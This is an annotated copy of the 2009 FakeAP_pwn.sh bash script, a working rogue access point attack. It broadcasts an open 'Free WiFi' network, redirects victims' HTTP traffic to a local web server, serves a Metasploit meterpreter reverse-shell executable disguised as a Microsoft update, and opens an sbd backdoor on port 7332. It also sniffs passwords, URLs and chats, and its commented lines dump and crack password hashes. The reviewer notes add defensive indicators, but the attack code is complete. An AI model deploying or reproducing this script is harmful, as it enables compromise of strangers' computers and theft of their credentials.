- #! /bin/bash
- # (C)opyright 2009 - g0tmi1k
- #
- # FakeAP_pwn.sh
#
# Reviewer annotations: lines starting with a bare "#" are added notes.
#
# Overview of what the listing does, in order: starts an open access point,
# configures the at0 interface and NAT, starts a DHCP server and Apache,
# redirects cleartext HTTP (TCP/80) to the local web server, writes a Windows
# executable into the web root, waits for a marker file in /tmp, rebuilds the
# NAT rules without the HTTP redirect, then starts a listener and sniffers.
#
# Not shown on this page: /root/FakeAP_pwn/dhcpd.conf and
# /root/FakeAP_pwn/fakeap_pwn.rb. Anything said about them below is hedged.
#
# Operational hygiene: there is no error checking and no cleanup. The host's
# firewall rules are flushed (not saved/restored), ip_forward stays enabled,
# and the background xterm/konsole processes are left running.
#
# Indicators visible in this listing (useful for detection/forensics):
#   - SSID "Free WiFi" on an open network
#   - web-root file MS016455.exe
#   - C:/sbdbg.exe and TCP port 7332 towards 10.0.0.1 (see commented lines)
#   - client subnet 10.0.0.0/24 with gateway 10.0.0.1
- # Settings
# Hard-coded environment: upstream gateway, upstream NIC, and the NIC used
# for the access point. Exported, so child processes inherit them.
- export gatewayip=192.168.1.1
- export internet_interface=wlan0
- export fakeap_interface=wlan1
- echo "[>] Starting: FakeAP_pwn - g0tmi1k"
- # FakeAP
- echo "[+] Setting up FakeAP"
# tun module is loaded before airbase-ng; the at0 interface configured below
# is presumably created by airbase-ng -- TODO confirm.
- modprobe tun
# -P answers every probe request and -C 30 beacons probed ESSIDs, so clients
# with remembered open networks may auto-join. Defender view: disable
# auto-join for open networks; a wireless IDS can flag an AP that answers
# probes for arbitrary ESSIDs. $fakeap_interface is unquoted.
- xterm -geometry 75x15+1+0 -T FakeAP -e airbase-ng -P -C 30 -e "Free WiFi" $fakeap_interface -v&
# Fixed 2 s delay instead of checking that at0 actually exists.
- sleep 2
- # Tables
- echo "[+] Setting up forwarding tables..."
- ifconfig lo up
- ifconfig at0 up
- ifconfig at0 10.0.0.1 netmask 255.255.255.0
- ifconfig at0 mtu 1400
- route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
# The next four commands wipe ALL existing filter and nat rules and user
# chains on the host running the script; nothing restores them later.
- iptables --flush
- iptables --table nat --flush
- iptables --delete-chain
- iptables --table nat --delete-chain
# Turns the host into a router (persists until changed back or reboot).
- echo 1 > /proc/sys/net/ipv4/ip_forward
# No --dport and no -i match: every UDP datagram hitting PREROUTING is
# rewritten to $gatewayip, not only DNS.
- iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
- #iptables -P FORWARD ACCEPT
- iptables --append FORWARD --in-interface at0 -j ACCEPT
- iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
- # DHCP
- echo "[+] Setting up DHCP server..."
# DHCP server bound to at0; lease range and options come from dhcpd.conf,
# which is not part of this page.
- xterm -geometry 75x25+1+100 -T DHCP -e dhcpd3 -d -f -cf /root/FakeAP_pwn/dhcpd.conf at0&
- sleep 2
- # Need the user to come here
- echo "[+] Start web server..."
- #xterm -geometry 75x25+1+200 -T WebServer -e sh -c "start-apache"&
# No trailing "&": the script blocks here until the init script returns.
- xterm -geometry 75x25+1+200 -T WebServer -e /etc/init.d/apache2 start
- sleep 2
- # So lets force them!
- echo "[+] Force user to vist our site..."
# Only destination port 80 is matched, so only cleartext HTTP is redirected
# to the local web server. Defender view: the rules shown do not touch
# TCP/443; HTTPS with certificate validation (and HSTS) is the control that
# makes this kind of silent redirection visible to the user.
- iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1
- # Bad boy stuff!
- echo "[+] Here comes metasploit..."
# cd result is not checked; the ./msf* calls below depend on it.
- cd /pentest/exploits/framework3
# Writes a Windows executable into the web root. The file name resembles a
# Microsoft bulletin id, presumably to look like an update. It only runs if
# the user downloads and executes it, so application allow-listing and
# "do not run downloads from captive pages" guidance both apply.
# LPORT is not set, so the framework's default port is used.
- ./msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 X > /var/www/MS016455.exe
# Message is printed before the handler starts; the actual upload presumably
# happens inside the AutoRunScript (fakeap_pwn.rb, not shown) -- TODO confirm.
- echo "[+] Uploading SBD..."
- xterm -geometry 75x25+1+300 -T Metasploit -e ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=10.0.0.1 AutoRunScript=/root/FakeAP_pwn/fakeap_pwn.rb E&
- sleep 2
- # upload //root/FakeAP_pwn/ C:/
- # execute -f "C:/sbdbg.exe -q -r 10 -k g0tmi1k -e cmd -p 7332 10.0.0.1"
- #./msfconsole -r /root/FakeAP_pwn/fakeap_pwn.rc
- # Wait till user is connected
# Clears a stale marker. rm prints an error if the file is absent; the script
# continues because no "set -e" is in effect.
# NOTE(review): fixed, predictable name in /tmp -- any local user can create
# it and end the wait loop early. What creates it is not shown here
# (presumably fakeap_pwn.rb).
- rm -r /tmp/FakeAP_pwn.tmp
- echo "[-] Waitng for target to connect..."
# Polls once per second with no timeout.
- while [ ! -e /tmp/FakeAP_pwn.tmp ]; do
- sleep 1
- done
- # They give us access to their system, so lets give them internet back ;)
- echo "[+] Give them (our) internet back..."
# Same route as added earlier; presumably a no-op or "File exists" error.
- route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
# Rules are flushed and rebuilt exactly as before, minus the TCP/80 DNAT, so
# client HTTP traffic is forwarded upstream again.
- iptables --flush
- iptables --table nat --flush
- iptables --delete-chain
- iptables --table nat --delete-chain
- iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
- #iptables -P FORWARD ACCEPT
- iptables --append FORWARD --in-interface at0 -j ACCEPT
- iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
- # Lets connect! =)
- # *** If FakeAP_pwn.rb upload bit is edited, you could replace the line below with VNC! ***
- echo "[+] Lets us back in..."
# Listener on TCP 7332. The key is hard-coded in the source and passed on the
# command line, so it is visible in the process list and to every reader of
# this listing. Port 7332 is a usable network indicator.
- konsole -T BackDoor -e sbd -l -k g0tmi1k -p 7332&
- sleep 2
- # Get as much info as poss!
- echo "[+] Watch what they do..."
# The three sniffers below use a literal wlan0 rather than
# $internet_interface, so changing the setting at the top does not affect
# them. These tools parse cleartext protocols; traffic protected by TLS or a
# VPN is not exposed to them.
- # URLs
- xterm -geometry 100x10+470+0 -T URLs -e urlsnarf -i wlan0&
- # Passwords
- xterm -geometry 100x10+470+150 -T Passwords -e dsniff -i wlan0&
- # IM Chats
- xterm -geometry 100x10+470+300 -T "IM Chat" -e msgsnarf -i wlan0&
- echo
- echo "[+] DONE - Have you, g0tmi1k?"
# Everything from here to the end of the listing is commented out and never runs.
- # Lets get some stuff from metasploit whistle we are at it!
- #sysinfo
- #getuid
- #use priv
- #hashdump > /tmp/FakeAP_pwn-hash.txt
- ##session -l
- ##session -i 1
- # Lets crack the hash
- #cd /pentest/passwords/jtr/
- #./john /tmp/FakeAP_pwn-hash.txt